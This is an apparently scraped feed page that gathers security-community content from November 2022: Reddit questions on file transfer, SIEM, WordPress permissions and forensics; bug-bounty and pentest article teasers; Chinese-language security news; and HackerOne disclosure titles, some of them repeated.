    Hi all, just curious about what tools or products you use to transfer sensitive files to your clients/customers. I am searching for a convenient but secure enough way to transfer pentesting reports and audit files after an assessment. We are currently using a tool named "FTAPI". It works great, but I am really interested in alternatives or your approach. I am aware of the following methods: Using encrypted zip files protected by a password. The password is communicated to the client via a second channel. Disadvantage is the need to communicate the decryption password via a second channel. Using one of the various E2E file transfer products that rely on the decryption key being placed inside the file's access link (url) after #. So the decryption happens on the client side. Disadvantage is that anyone with knowledge of the link can just access the files. No additional user authentication needed. If an additional password prompt is required , we are again in need to communicate the password via a second channel. Additional features like limiting how often the link can be accessed is often bricked by 3rd party link scanners like Microsoft's Secure Link. General SMIME/PGP mail encryption Disadvantage is that many companies and clients don't have it. What's your approach? Thanks in advance! submitted by /u/sk1nT7 [link] [comments]
    SOC architecture - SIEM - SOAR - IR
    Hello, Do you have any experience integrating Splunk with Shuffle and Thehive? I got no idea where to start and don't have the picture painted in my mind so any architectural/networking information would be highly appreciated! Do you think it's a good combination? Any tips, recommendations or materials are welcome. ​ Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    Correct rule for Permissions and security for files?
    There are 3 options for every file and folder in WP - Read, write and execute for User, group and world. User is the admin right? world means public? and group I dont have any other people as admin or editor. Only me running the site. By default, wp-login.php is set to group and world too. Does that mean people will be able to view the login page of my site? should not I uncheck world and group? [Imgur](https://imgur.com/KNcKhiU) By default, wp-admin.php is set to Read and Execute for Group and world also. But why? Why the world needs to see and execute wp-admin.php? Should not the user only have read, write and execute? [Imgur](https://imgur.com/x37WOCT) Similary with wp-config.php read is also there for group and world. This can be because loginizer advised to change to 0444 and I did chmod 0444 for wp-config.php. [Imgur](https://imgur.com/h5PG2mb) Am I missing some logic here? submitted by /u/yoyobono [link] [comments]
    ClamAV 1.0.0 LTS released | OpenSource AntiVirus | Cisco Talos
    ClamAV 1.0.0 LTS released - OpenSource AntiVirus - Cisco Talos https://blog.clamav.net/2022/11/clamav-100-lts-released.html submitted by /u/Neustradamus [link] [comments]
  • Open

    What are you using to collaborate on collection of OSINT data?
    Title. My team and I use OneNote purely for the collaboration features but boy is it a PITA to digest information after the fact. I’d love to use Obsidian but the LOE to get the team up to speed isn’t worth it in a pinch, not at the moment at least. submitted by /u/cyberbutler [link] [comments]
  • Open

    Uygulamalarla Siber Güvenlik
    Siber Güvenlik Haftası kapsamında 29.11.2022 tarihinde gerçekleştirmiş olduğum “Uygulamalarla Siber Güvenlik” isimli webinarımda kullanmış… Continue reading on Siber »
    Uygulamalarla Siber Güvenlik
    Siber Güvenlik Haftası kapsamında 29.11.2022 tarihinde gerçekleştirmiş olduğum “Uygulamalarla Siber Güvenlik” isimli webinarımda kullanmış… Continue reading on Bilişim Hareketi »
    I asked 10 Hackers Their Favourite Ways to Break into Organizations
    Hello all, I come bearing gifts once more. To all cybersecurity professionals (especially those at Management and C-level) — I asked my… Continue reading on System Weakness »
    Subdomain Enumeration with DNSSEC
    Enumerating DNS zones by using DNSSEC records like NSEC and NSEC3 Continue reading on SSE Blog »
  • Open

    P1 Bug Hunting — Remote and Local File Inclusion Vulnerabilities
    TL;DR- A full walkthrough and step-by-step process that lands you bug bounties within minutes on file inclusion vulnerabilities. Continue reading on The Gray Area »
    Who Will You Learn From at IWCON2022?
    Check out the star-studded speaker-line-up for the much-awaited cybersecurity conference. Continue reading on InfoSec Write-ups »
    Subdomain Enumeration with DNSSEC
    Enumerating DNS zones by using DNSSEC records like NSEC and NSEC3 Continue reading on SSE Blog »
    How To Install Autorize on Burpsuite
    Simple Steps to Install Autorize with Jython inside Burpsuite’s Bapp Store | November 2022 ~ Karthikeyan Nagaraj Continue reading on System Weakness »
    Full RCE via File Upload + Reverse shell OpenBugBounty
    The video is here: https://youtu.be/RIMb0I8DydU Continue reading on Medium »
    Unvalidated Redirects and Forwards
    Introduction Continue reading on InfoSec Write-ups »
    VoIP Spoofing (Intigriti) 1,250€
    Hello Folks, i just want to explain a misconfiguration that affect an asset on Intigriti. So, let’s start!! Continue reading on Medium »
    Recon
    The Art of Gathering Information Continue reading on Medium »
    Unrestricted File Upload: A Common Bug With A High Potential Revenue On HackerOne! — StackZero
    An explanation of what is unrestricted file upload vulnerability and how to exploit it in a lab by using DVWA. Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-11-29 Review
    DSRE-数据安全风险枚举知识框架 by ourren Windows Defender内存扫描功能分析 by asdjkl 深入挖掘红队实战中WinRM的使用技巧 by asdjkl 浅谈CVE-2022-22965漏洞成因(六) by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-29 Review
    DSRE-数据安全风险枚举知识框架 by ourren Windows Defender内存扫描功能分析 by asdjkl 深入挖掘红队实战中WinRM的使用技巧 by asdjkl 浅谈CVE-2022-22965漏洞成因(六) by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Who Will You Learn From at IWCON2022?
    No content preview
    Best Information Technology Schools in 2023
    No content preview
    How to Plug Common Supply Chain Vulnerabilities
    No content preview
    Unvalidated Redirects and Forwards
    Introduction Continue reading on InfoSec Write-ups »
    Unrestricted File Upload: A Common Bug With A High Potential Revenue On HackerOne! — StackZero
    No content preview
    Behind the SMS Bombing Application
    No content preview
  • Open

    Who Will You Learn From at IWCON2022?
    No content preview
    Best Information Technology Schools in 2023
    No content preview
    How to Plug Common Supply Chain Vulnerabilities
    No content preview
    Unvalidated Redirects and Forwards
    Introduction Continue reading on InfoSec Write-ups »
    Unrestricted File Upload: A Common Bug With A High Potential Revenue On HackerOne! — StackZero
    No content preview
    Behind the SMS Bombing Application
    No content preview
  • Open

    Who Will You Learn From at IWCON2022?
    No content preview
    Best Information Technology Schools in 2023
    No content preview
    How to Plug Common Supply Chain Vulnerabilities
    No content preview
    Unvalidated Redirects and Forwards
    Introduction Continue reading on InfoSec Write-ups »
    Unrestricted File Upload: A Common Bug With A High Potential Revenue On HackerOne! — StackZero
    No content preview
    Behind the SMS Bombing Application
    No content preview
  • Open

    OSINT — Поиск информации о гражданах и компаниях Польши.
    Prod.ceidg.gov.pl — поиск юр. лиц в нац. реестре Польши. Continue reading on Medium »
    Subdomain Enumeration with DNSSEC
    Enumerating DNS zones by using DNSSEC records like NSEC and NSEC3 Continue reading on SSE Blog »
    Ohsint
    Try Hack Me Continue reading on Medium »
  • Open

    Measuring the Impact of a Security Awareness Program
    Our goal in building a security awareness program is to embed security into our partners’ existing organizational culture. Impacting culture is a long-term process that can take years and requires executive support. If you are tasked with managing a security awareness program, it is your job to measure and show leadership that your program is... The post Measuring the Impact of a Security Awareness Program appeared first on TrustedSec.
  • Open

    MSMAP:一款功能强大的内存WebShell生成工具
    MSMAP是一款功能强大的内存WebShell生成工具,可以帮助广大研究人员更好地生成、管理和使用WebShell。
    如何使用EvilTree在文件中搜索正则或关键字匹配的内容
    EvilTree是一款功能强大的文件内容搜索工具,该工具基于经典的“tree”命令实现其功能。
    FreeBuf早报 | 索尼等闪存设备加密提供商泄露数据;宏碁电脑存在驱动程序漏洞
    索尼、雷克沙、闪迪等USB设备的加密解决方案提供商—荷兰软件公司 ENC Security 被曝出泄露配置和证书文件长达一年多。
    俄罗斯 RansomBoggs勒索软件“盯上”乌克兰实体
    斯洛伐克网络安全公司ESET表示,针对多个乌克兰实体的攻击在2022年11月21日首次发现。
    因泄露5.33亿用户隐私,Facebook被罚2.65亿欧元
    爱尔兰数据保护委员会因2021年Facebook大规模数据泄露事件,向其母公司Meta开出2.65亿欧元(约20亿人民币)巨额罚单。
    针对 Facebook 业务和广告帐户的 DUCKTAIL 恶意软件又回来了
    鱼叉式网络钓鱼组织已修改其策略,并根据对 Facebook 业务和广告管理帐户的广泛研究,采用更复杂的技术和策略。
  • Open

    YApi <1.12.0 远程命令执行漏洞
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/UTMly3wLfK0SQHOj5CcN8w 前言 实验室团队开发出一款自动化Web/API漏洞Fuzz的命令行扫描工具(工具地址:https://github.com/StarCrossPortal/scalpel)。本周将重点持续更新漏洞POC库,已新增多个热门组件的漏洞检测规则...
  • Open

    YApi <1.12.0 远程命令执行漏洞
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/UTMly3wLfK0SQHOj5CcN8w 前言 实验室团队开发出一款自动化Web/API漏洞Fuzz的命令行扫描工具(工具地址:https://github.com/StarCrossPortal/scalpel)。本周将重点持续更新漏洞POC库,已新增多个热门组件的漏洞检测规则...
  • Open

    Post Compilation
    Investigating Windows Systems It's the time of year again when folks are looking for stocking stuffers for the DFIR nerd in their lives, and my recommendation is a copy of Investigating Windows Systems! The form factor for the book makes it a great stocking stuffer, and the content is well worth it! Yes, I know that book was published in 2018, but when I set out to write the book, I wanted to do something different from the recipe of most DFIR books to that point, including my own. I wanted to write something that addressed the analysis process, so the book is full of pivot and decision points, etc. So, while artifacts may change over time...some come and go, others become new and change in format over time, others suddenly appear...it's the analysis process that doesn't change. For exampl…

  • Open

    Beating Plagiarism Checkers with a Custom Font
    submitted by /u/Exact-Practice-8658 [link] [comments]
    subzuf – a smart DNS response-guided subdomain fuzzer
    submitted by /u/feecle [link] [comments]
    Exception(al) Failure - Breaking the STM32F1 Read-Out Protection
    submitted by /u/Gallus [link] [comments]
    ransomwhere: a ransomware sample to test out your ransomware response strategy.
    submitted by /u/nindustries [link] [comments]
    Heap_detective is an open-source static analysis tool that finds pitfalls in heap memory usage in C and C++.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    [BUG BOUNTY] SUBDOMAIN TAKEOVER IN TARGET CNAME NETLIFY
    Um controle de subdomínio ocorre quando um invasor obtém controle sobre um subdomínio de um domínio de destino. Normalmente, isso acontece… Continue reading on Medium »
    Improper error handling leads to exposing internal tokens
    Recently I started using a new application for secret management. Let the name be [redacted]. Continue reading on Medium »
    Broken access control + misconfiguration = Beautiful privilege escalation
    Hello His/Her Continue reading on Medium »
    The Benefits and Drawbacks of Bug Bounty Programs
    Severe defects that reach customers have a very real effect on the bottom line. Continue reading on Bug Zero »
    Bug Bounty Alert: Welcome Gton Capital
    Today we welcome Gton Capital to the Hats ecosystem! We are happy to help them take the right path towards decentralized security. Their… Continue reading on Medium »
    5 Different Techniques to Perform Account Takeover
    1. No Rate-Limit / Brute-Forcing Continue reading on Medium »
    Bug Bounty Programs: What Are They?
    Everything You Should Know Continue reading on Bug Zero »
    What is Bug Bounty & How to Get Started?
    A Definitive Guide to Bug Bounty Continue reading on Bug Zero »
  • Open

    NEED HELP WITH PORTFORWARDING
    I wanted to host my apache web server on WAN using my Virtual Machine (Kali Linux) I have configured my virtual machine network adapter settings into NAT (Protocol - TCP) (HOST PORT=8080) (GUEST PORT=80) (HOST IP:127.0.0.1) (GUEST IP: 10.0.2.15). I have also enabled IPv4 Port Forwarding on my router but this is where I got confused you see, when I selected my kali Linux device it gave me a different IP which is 192.168.18.26, however when I typed in my terminal I.P. address it shows that my I.P. is 10.0.2.15. So I made 2 different profile one is with the 192.168.18.26 IP and the other is with the 10.0.2.15 IP (both has the same external ip address of 103.36.19.202 and both has the same External port number: 80 80 / Internal port number: 80 80). I failed to establish connection over wan what should I do ? submitted by /u/prod_kenn [link] [comments]
    What am I missing?
    So I'm already using password managers and 2FA with Yubikeys. I back up my data and use only encrypted drives, I try to manage app permissions on my laptop and my phone too, and turn off my camera and microphone when not in use. For browsing, I only use Brave and DDgo with all my networks using encrypted DNS. Now my question: is there anything else I can possibly do to make my internet life safer and limit my exposure to possible dangers? Anything helps, thank you guys in advance for your time, and stay safe. submitted by /u/xaintmex [link] [comments]
    Question about OCSP
    I have an assignment in which I have to implement OCSP and do a proof of concept of a vulnerability. My ideia was to implement OCSP without using a nonce (this is done) and then perform a replay attack. However I'm having trouble doing the replay attack on localhost. Does anyone have another suggestion for a proof of concept of an attack I can do? I can't find much about this online Thanks submitted by /u/Smart-Ad-3268 [link] [comments]
  • Open

    NIST Study
    NIST has just released the final version of its Scientific Foundation for Digital Investigation https://www.nist.gov/spo/forensic-science-program/digital-investigation-techniques-nist-scientific-foundation-review. The study shows that the field has a firm scientific foundation with caveats about the rapid pace of change and technical limitations of some techniques. It includes an estimate of how many digital evidence labs there are in the US. For reference, there are 400 crime labs tracked by DoJ; NIST estimates that there are at least 11,000 DE labs. (Wow!) There are several other interesting discussions - especially about uncertainty and error rates. TL;DR error rates are not a good way to discuss uncertainty in DE. Use an error mitigation analysis instead. See SWGDE Establishing Confidence in Digital and Multimedia Evidence Forensic Results by Error Mitigation Analysis. submitted by /u/p-firecat [link] [comments]
    Discontinued SATA & IDE Write Blocker from CoolGear & Sharkoon
    submitted by /u/y8llow [link] [comments]
    Autopsy and Keywords in Unallocated Space/File Slack
    Hello, I have a test file image where I have placed some "Simulated" text info into file slack but I am unable to locate it with an Autopsy Keyword search. Is there a way to INDEX Unallocated and any Slack space from a drive so I can do a successful keyword search? Thanks for any help or direction... submitted by /u/Peardog_PA [link] [comments]
    Ring doorbell no active subscription
    Working a case where a Ring doorbell was at the scene but there is likely no active subscription. Anyone know if the device will have any video stored on it? Does Ring possibly have any video stored in their cloud? submitted by /u/Wy2kWgm6JpLt [link] [comments]
    Emotet Strikes Again - LNK File Leads to Domain Wide Ransomware - The DFIR Report
    submitted by /u/TheDFIRReport [link] [comments]
    Autopsy Browser on Linux question
    Working on the CFReDS Hacking Case reference set to start getting a feel for forensics, I’m running into a problem with the Autopsy Browser on Kali. I’m running it on a homelab server and accessing it from a separate device’s browser and it feels like it lacks all of the features that Windows Autopsy has. As far as I can find, there’s no way to get OS information aside from version and file system type, whereas the Windows Autopsy program goes in-depth with that. Am I missing something, or is the Linux/Kali version of Autopsy just not good? Is it more useful to just learn the Windows version as opposed to practicing with the one offered on Linux? submitted by /u/TechThrowawayQR [link] [comments]
  • Open

    OSINT — Поиск по электронной почте и логинам.
    Snusbase — индексирует информацию из утечек и дает доступ к поиску по скомпрометированным адресам электронной почты, логинам, именам… Continue reading on Medium »
    Catching the scammer through cryptocurrency tracking. OSINT & CRYPTOCURRENCY.
    Original text and other information on OSINT is available at>>>> Continue reading on Medium »
  • Open

    potential denial of service attack via the locale parameter
    Internet Bug Bounty disclosed a bug submitted by benjaoming_realone: https://hackerone.com/reports/1746098 - Bounty: $2400
  • Open

    2021 Owasp Top 10 逐个击破之A10:服务端请求伪造 (SSRF)
    本系列会详细介绍各个漏洞的变化与内容,并会着重介绍新增的漏洞情况。本篇解读A10 服务端请求伪造。
    2021 Owasp Top 10 逐个击破之A09:安全日志和监控故障
    本系列会详细介绍各个漏洞的变化与内容,并会着重介绍新增的漏洞情况。本篇解读A09 安全日志和监控故障。
    FreeBuf早报 | 推特离职潮冲击监管合规和内容审查部门;今年最常用的密码仍然是password
    最常用密码相比过去几年差异并不大:password、123456、123456789、guest、qwerty、12345678、111111、12345、col123456 和 123123。
    fastjson1.2.80 Attack
    fastjson1.2.80利用链分析且结合JDBC attack手法
    溯源专题 | 通过压缩文件溯源攻击者信息
    如何通过压缩文件溯源攻击者信息?
    CVE-2022-22963漏洞分析
    如下内容如有不正确之处请指正漏洞分析
    Gartner发布2022年中国安全技术成熟度曲线
    该曲线指出,随着国内数字化转型的推进,企业机构数字资产保护已成为安全和风险管理领导者的关键任务。
    戴尔、惠普和联想设备使用过时的 OpenSSL 版本
    Binarly 研究人员发现,戴尔、惠普和联想的设备仍在使用过时版本的 OpenSSL 加密库。
    难怪马斯克裁掉整个安全部门,Twitter 540万用户数据在暗网公开
    此外,安全人员还披露了另外一个可能泄露的,规模更大的数据库,其中包含了上千万条Twitter数据。
    以威胁国家安全为由,美国禁止销售中兴、海康威视等电信和监控设备
    美国政府禁止进口和销售包括华为和中兴通讯在内的,中国科技巨头制造的电信和监控设备。
  • Open

    WinLogon Windows Reverse Shell Persistence
    Introduction Continue reading on The Gray Area »
    Home Grown Red Team: From Workstation To Domain Controller With Havoc C2 and Microsoft EDR
    Welcome back! In this blog entry we’ll be facing off with Microsoft’s Defender For Endpoint EDR once again to see if we can go from a low… Continue reading on Medium »
  • Open

    SecWiki News 2022-11-28 Review
    AFL系模糊器中Havoc变异策略研究与改进 by ourren NAUTILUS:面向语法的灰盒模糊测试方法 by ourren 2022年中国安全技术成熟度曲线 by ourren SecWiki周刊(第456期) by ourren CobaltStrike4.5 分析总结 by ourren MITRE ATT&CK 第五轮评估结果发布 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-28 Review
    AFL系模糊器中Havoc变异策略研究与改进 by ourren NAUTILUS:面向语法的灰盒模糊测试方法 by ourren 2022年中国安全技术成熟度曲线 by ourren SecWiki周刊(第456期) by ourren CobaltStrike4.5 分析总结 by ourren MITRE ATT&CK 第五轮评估结果发布 by Avenger 更多最新文章,请访问SecWiki
  • Open

    ‍IW Weekly #35: HTTP Desync Attack, Mass Account Takeover, SSRF via DNS Rebinding, Exploiting…
    No content preview
    Automate GitHub Actions Security Best Practices
    No content preview
    TryHackMe writeup: BadByte
    That lassie with the dragon tattoo took a bad byte — but nothing more than she can chew ;-) Continue reading on InfoSec Write-ups »
    Write-up: Basic server-side template injection (code context) @ PortSwigger Academy
    No content preview
    Python Malware Analysis
    No content preview
    A great weekend hack(worth $8k)
    No content preview
    TryHackMe WriteUp: Warzone 2
    No content preview
    How I hacked into a government e-learning website
    No content preview
    Inyección SQL divertida 3— MSSQL ejemplo practico | In Spanish
    Hola querido lector, de verdad me da mucho gusto que me regales un poco de tu valioso tiempo para leer el siguiente escrito. En esta… Continue reading on InfoSec Write-ups »
  • Open

    ‍IW Weekly #35: HTTP Desync Attack, Mass Account Takeover, SSRF via DNS Rebinding, Exploiting…
    No content preview
    Automate GitHub Actions Security Best Practices
    No content preview
    TryHackMe writeup: BadByte
    That lassie with the dragon tattoo took a bad byte — but nothing more than she can chew ;-) Continue reading on InfoSec Write-ups »
    Write-up: Basic server-side template injection (code context) @ PortSwigger Academy
    No content preview
    Python Malware Analysis
    No content preview
    A great weekend hack(worth $8k)
    No content preview
    TryHackMe WriteUp: Warzone 2
    No content preview
    How I hacked into a government e-learning website
    No content preview
    Inyección SQL divertida 3— MSSQL ejemplo practico | In Spanish
    Hola querido lector, de verdad me da mucho gusto que me regales un poco de tu valioso tiempo para leer el siguiente escrito. En esta… Continue reading on InfoSec Write-ups »
  • Open

    ‍IW Weekly #35: HTTP Desync Attack, Mass Account Takeover, SSRF via DNS Rebinding, Exploiting…
    No content preview
    Automate GitHub Actions Security Best Practices
    No content preview
    TryHackMe writeup: BadByte
    That lassie with the dragon tattoo took a bad byte — but nothing more than she can chew ;-) Continue reading on InfoSec Write-ups »
    Write-up: Basic server-side template injection (code context) @ PortSwigger Academy
    No content preview
    Python Malware Analysis
    No content preview
    A great weekend hack(worth $8k)
    No content preview
    TryHackMe WriteUp: Warzone 2
    No content preview
    How I hacked into a government e-learning website
    No content preview
    Inyección SQL divertida 3— MSSQL ejemplo practico | In Spanish
    Hola querido lector, de verdad me da mucho gusto que me regales un poco de tu valioso tiempo para leer el siguiente escrito. En esta… Continue reading on InfoSec Write-ups »
  • Open

    How to get EDRs ?
    Hi ! Red Teamers, how to you get EDRs to test your payloads ? I understand it is essential to test your payloads but getting EDR seems to be the real challenge. Do you have some solutions known to be easier to get than others ? Or have more interesting detection capabilities which are good to test your payloads on ? submitted by /u/hegusung [link] [comments]
  • Open

    Koxic 勒索软件在韩国传播
    作者:ASEC BLOG 译者:知道创宇404实验室翻译组 原文链接:https://asec.ahnlab.com/en/42343/ 据悉,Koxic勒索软件正在韩国境内传播。它在今年早些时候首次被发现,最近该团队发现,一个外观和内部勒索笔记都经过修改的文件被检测到,并被ASD基础设施屏蔽。 当感染时,“.KOXIC_[Random string]”扩展名将添加到加密文件的名称中,并在每...
  • Open

    Koxic 勒索软件在韩国传播
    作者:ASEC BLOG 译者:知道创宇404实验室翻译组 原文链接:https://asec.ahnlab.com/en/42343/ 据悉,Koxic勒索软件正在韩国境内传播。它在今年早些时候首次被发现,最近该团队发现,一个外观和内部勒索笔记都经过修改的文件被检测到,并被ASD基础设施屏蔽。 当感染时,“.KOXIC_[Random string]”扩展名将添加到加密文件的名称中,并在每...
  • Open

    Challenge 7 Write-up
    Dr. Ali Hadi recently posted another challenge image, this one (#7) being a lot closer to a real-world challenge than a lot of the CTFs I've seen over the years. What I mean by that is that in the 22+ years I've done DFIR work, I've never had a customer pose more than 3 to 5 questions that they wanted answered, certainly not 51. And, I've never had a customer ask me for the volume serial number in the image. Never. So, getting a challenge that had a fairly simple and straight forward "ask" (i.e., something bad may have happened, what was it and when??) was pretty close to real-world.  I will say that there have been more than a few times where, following the answers to those questions, customers would ask additional questions...but again, not 37 questions, not 51 questions (like we see in …

  • Open

    How to deal with non techs who give me tech tips
    Hi folks. I have recently earned a Masters in Cybersecurity and have done some freelance work at small businesses in my area. I have been working with computers on my free time since the days of DOS, Word Perfect, and Dot Matrix printers. I have found it difficult lately to deal with family members who insist on providing me with information on the latest cyberthreat video or article that they find on the internet. Often the videos demonstrate threats that are hoaxes and could leave a viewer thinking they have security awareness while the most common methods and safeguards are missed. I find this frustrating. It is really difficult because I don't want to seem like a "know it all," but I want to say "damn, you know I didn't go to school and graduate at the top of my class for nothing." I feel like an alien sometimes. Please share some kind advice. submitted by /u/DataQUeen_718 [link] [comments]
    Help with skills to focus on for 2023.
    Hello there, I am reaching out to the community for help making the career change into IT/Security. I recently finished my masters in systems security to help bridge some experience gaps and overcome the dreaded HR checklist requirement. However, I am experiencing a bit of frustration when it comes to figuring out what skills employers are looking for. Any job postings I come across are incredibly vague, with the usual sprinkle of exaggerated requirements for an entry-level job. Ideally, I would like to enter an entry-level SOC job, as research shows that's a great position to start and get lots of exposure to different scenarios. My question is, what skills should I be focusing on, and what is fluff someone from HR wrote on the requirement when they googled "cyber security skills"? submitted by /u/Cpt-Dynamite [link] [comments]
    What are the requirements to become a pen tester?
    Hi. I would like to become to a pen tester after college, and I was wondering why some pen testing jobs require that you gain IT and cybersecurity experience first. How do I gain IT and or cybersecurity experience after college? submitted by /u/AlternativeNo5023 [link] [comments]
    Need opinions on the situation
    My company deals with data hosting & server backends. Currently, some parts of the company are in need of major upgrades due to multiple break downs & issues. Management is planning to replace some aging APs, routers & CCTVs within my company. I've been told to look for some prospective equipment however management wants to cut down costs but at the same time is requiring secured equipment. My company is medium sized enterprise with 60 people across all the various departments. I've looked at some of the equipment from the different providers. At this point of time I'm considering produdcts from Mikrotik, Juniper, Cisco & Arcadyan. However, the prices quoted to me, it goes beyond budget allotted. Hence, it has been an issue On the other side, I'm looking at ZTE, Huawei, Ruijie, Dahua & Hikvision equipment. They've a wider selection of equipment to choose from & it easily meets the budgets requirements based on the quotations given. I'd be keen on using the equipment however, I'd have to run it by the management. I brought my proposals to my manager with the quotation. He was open to my suggestions on using China quipment, however he was more favored to equipment from Taiwan & South Korea due to possible vulnerability/backdoors it might contain. However, when I discussed the quotations given by the vendors & other costs related, he told that me he'll speak to the finance team regarding this. I'd like opinions here as I believe that every product has a vulnerability regardless of the origin of the manufacturer. What would y'all suggest? Should management only look at Taiwanese, South Korean & Western manufacturers or consider Chinese manufacturers as well? submitted by /u/LMJR500Army [link] [comments]
    is developer or helpdesk/sysadmin better for cybersecurity career later
    I'm a 22 and I'm a student of evening computer science high school because i dropped it in adolescence. I'm still beginner, I'm this moment I'm studying C programming and how works Linux. In the future i would like studying malware and reverse engineering mainly but i would like trying offensive stuff too: pentesting, bug bounty, vulnerability research/ExploitDev... What could is the best first job to putting foot in the door ? Developer ? In my country mainly backend web stuff Helpdesk/Sysadmin ? Few jobs in my country submitted by /u/NewbieInTech00 [link] [comments]
  • Open

    The Untold SendBird Misconfigurations
    At a random bug hunting collaboration with my team (thaivu, lamscun, thefool45, fergustr4n), we had bumped into a random private target as… Continue reading on Medium »
    Firebase Exploit bug bounty
    Recently I manage to exploit a read/write permission on firebase but unfortunately it was marked as not applicable honestly it was also… Continue reading on Medium »
    Blockchain Books​
    We at WeFuzz, have created a collection of fantastic books for you if you’re looking to go further down the rabbit hole of #Web3. 🐰🐇 Continue reading on Medium »
    First Bug Bounty For Homeland Security Uncovers 122 Vulnerabilities
    What exactly is the Hack DHS Program? Continue reading on Bug Zero »
    Unique Rate limit bypass worth 1800$
    Proving the organization statement wrong with OOS Rate limit bypass. Continue reading on Medium »
    How to Install Gf Tool and Patterns on Kali Linux
    Install Gf tool and It’s Pattern on Kali Linux with Easy Simple Steps Continue reading on System Weakness »
    2FA Enabled Accounts Can Bypass Authentication & Access Account After Deactivation
    Hello All, Continue reading on Medium »
    Access Any Owner Account without Authentication (Auth bypass + 2FA bypass)
    Hello Folks, Continue reading on Medium »
    Bug Hunting 101: Exploiting Cross-Site Request Forgeries (CSRF)
    TL;DR- A quick and concise overview of CSRFs. What they are, what they can do, and how you can best benefit from them in bug bounty… Continue reading on The Gray Area »
  • Open

    An OSINT field specialist’s dream…
    I often have to use different operating systems. This is due to the fact that not every Kali or MacOS can run specific investigation… Continue reading on Medium »
    Shodan — Computer Search Engine | OSINT Framework #2
    What is Shodan? Continue reading on Medium »
    SPY NEWS: 2022 — Week 47
    Summary of the espionage-related news stories for the Week 46 (November 20–26) of 2022. Continue reading on Medium »
    ✈️ OSINT — Поиск самолета
    Continue reading on Medium »
    Email recipient logging rules…
    To successfully identify your interlocutor by correspondence, you should adhere to the following basic rules: Continue reading on Medium »
    OSINTGRAM — A creepy way to scrub data from Instagram
    I recently could setup my dedicated Kali Machine. Nothing special, just 16gigs of RAM running off a ThinkPad.  While searching for some… Continue reading on Medium »
  • Open

    Hacking Smartwatches for Spear Phishing – Red Team Ops – Cybervelia
    submitted by /u/Necessary-Reality-80 [link] [comments]
  • Open

    又一个 Golang 编写的僵尸网络:KmsdBot
    Akamai 最近通过全球部署的蜜罐,发现了一个为游戏行业量身定制的具有 DDoS 能力与加密货币挖掘能力的僵尸网络 KmsdBot。
    哨声吹响,与世界杯相关的欺诈也在激增
    2022 年世界杯已经开始,通过虚假流媒体网站与彩票针对足球迷的诈骗激增。
    有关c3p0的几点小利用
    c3p0是用于创建和管理连接,利用“池”的方式复用连接减少资源开销,和其他数据源一样,也具有连接数控制、连接可靠性测试、连接泄露控制、缓存语句等功能。
    无人机攻击:空中网络安全噩梦
    本文将通过回顾无人机市场趋势、流行的无人机黑客工具,以及可能用于破坏企业无人机平台的通用无人机黑客技术,探讨围绕无人机平台的网络安全考虑因素。
    ICS 2023年网络威胁预测
    卡巴斯基预测,未来一年的形势可能要复杂得多。在分析2022年的网络安全事件时,我们必须承认,我们已经迈入了一个新时代。
  • Open

    Vulnerability in AWS AppSync allowed unauthorized access to cloud resources
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-aws-appsync-allowed-unauthorized-access-to-cloud-resources Comments URL: https://news.ycombinator.com/item?id=33764013 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-11-27 Review
    JAVA开发中涉及的基础安全问题和解决方法初探 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-27 Review
    JAVA开发中涉及的基础安全问题和解决方法初探 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Live Forensics | What data you can recover or extract from RAM Memory | Volatile Data | Lecture
    submitted by /u/CybDig [link] [comments]
  • Open

    House projects in Kazahstan
    A quite big collection of building projects in Kostanay, Kazahstan. http://109.248.156.247/ submitted by /u/GloomyGenius [link] [comments]
  • Open

    TryHackMe Write-up: Internal
    Primer Continue reading on Medium »
    HIDE C2 SERVER WITH HTTP FORWARDERS
    Re-director atau traffic forwarder pada dasarnya adalah proksi antara server tim merah (katakanlah yang mengirim email phishing atau C2)… Continue reading on Medium »
  • Open

    Wordpress users Disclosure [ /wp-json/wp/v2/users/ ]
    MTN Group disclosed a bug submitted by shubham_srt: https://hackerone.com/reports/1735586

  • Open

    ip question
    Ip address question Hello, im asking this because i know nothing about this A random guy on facebook told me under a random page that he claims to have traced my ip address, all this just by sending a message on my facebook messenger; but I don't have messenger installed on my phone so I want to ask if what he says is true or not Thanks for every answer submitted by /u/Gino-Pizza [link] [comments]
    Reverse engineering homelab, GDB and multiple architectures?
    I recently competed in a CTF where I spent a large amount of time trying to get GDB to reverse a binary on both my Mac and Raspberry PI. At one point I installed the 'multiarch' version of GDB on the Raspberry Pi but was still not very successful. How would I create a homelab that could support as many architectures as possible (so I can be ready to RE any given binary or executable)? What are the tradeoffs of building a homelab with multiple architectures vs multi-architecture support in software like GDB? submitted by /u/UnemployedAWSGuy [link] [comments]
    How do you (or what are best practices) for protecting your important files in the cloud?
    I was thinking about just writing myself a easy little Python program with PyNaCl to handle file encryption/decryption locally prior to upload. https://pynacl.readthedocs.io/en/latest/secret/ (XSalsa20 + Poly1305) Any other suggestions? submitted by /u/Tough-Win-9367 [link] [comments]
    Does having n passwords for the same data lowers security by 1/n times?
    I have never seen any existing application that allowed me to assign more than 1 password for a single data, but I am afraid of forgetting the password and subsequently losing the data, so I have been thinking of writing my own tool that can allow me to use more than one password. The concept is simple: It will generate some random key, and use that key to encrypt that data. And then it encrypts that key with any number of passwords I enter. So, if I enter 10 passwords, it will have 10 encrypted keys. Later, if I enter any one of the 10 passwords, it will be able to decrypt the key, and use that key to decrypt the data. So, unless I forget all 10 passwords, I would not lose the data. My question is, does having n number of keys weaken the security by just 1/n, or more than 1/n? I mean, if it is 1/n, then using 10 passwords would be 1/10 security, but a (2128)/10 is practically not much different form 2128 (e.g., like 100 million years instead of 1 billion years for brute force attack). submitted by /u/evolution2015 [link] [comments]
  • Open

    Rogue Agents Writeup
    The exact location is where you always find it. Continue reading on The Sleuth Sheet »
    A walkthrough of CyberDefenders “GrabThePhisher — Threat intel” CTF
